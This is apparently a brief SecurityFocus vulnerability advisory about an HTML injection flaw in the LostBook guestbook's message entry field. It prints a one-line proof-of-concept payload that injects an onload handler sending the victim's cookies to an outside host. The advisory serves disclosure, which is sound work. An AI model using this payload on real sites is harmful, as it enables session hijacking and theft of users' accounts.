Verylost LostBook Message Entry HTML Injection Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

example.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie


 

Privacy Statement
Copyright 2010, SecurityFocus